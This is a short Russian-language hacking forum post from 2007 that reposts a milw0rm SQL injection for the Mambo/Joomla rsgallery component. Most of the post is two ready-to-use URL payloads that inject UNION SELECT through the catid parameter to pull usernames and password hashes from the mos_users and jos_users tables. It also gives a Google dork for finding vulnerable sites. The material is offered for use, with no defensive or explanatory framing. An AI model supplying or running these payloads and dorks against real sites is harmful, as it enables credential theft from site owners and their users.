06.12.2007, 09:24
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
milw0rmv: Mambo/Joomla Component rsgallery <= 2.0b5 (catid) SQL Injection Vuln
В догонку хочется сказать, что на Mambo перфикc mos_, на Joomla jos_
Mambo:
Код:
index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11+from+mos_users--
Joomla:
Код:
index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11+from+jos_users--
Dork:
Код:
Google : "option=com_rsgallery" или inurl:"index.php?option=com_rsgallery"
Последний раз редактировалось it's my; 06.12.2007 в 09:40..
|
|
|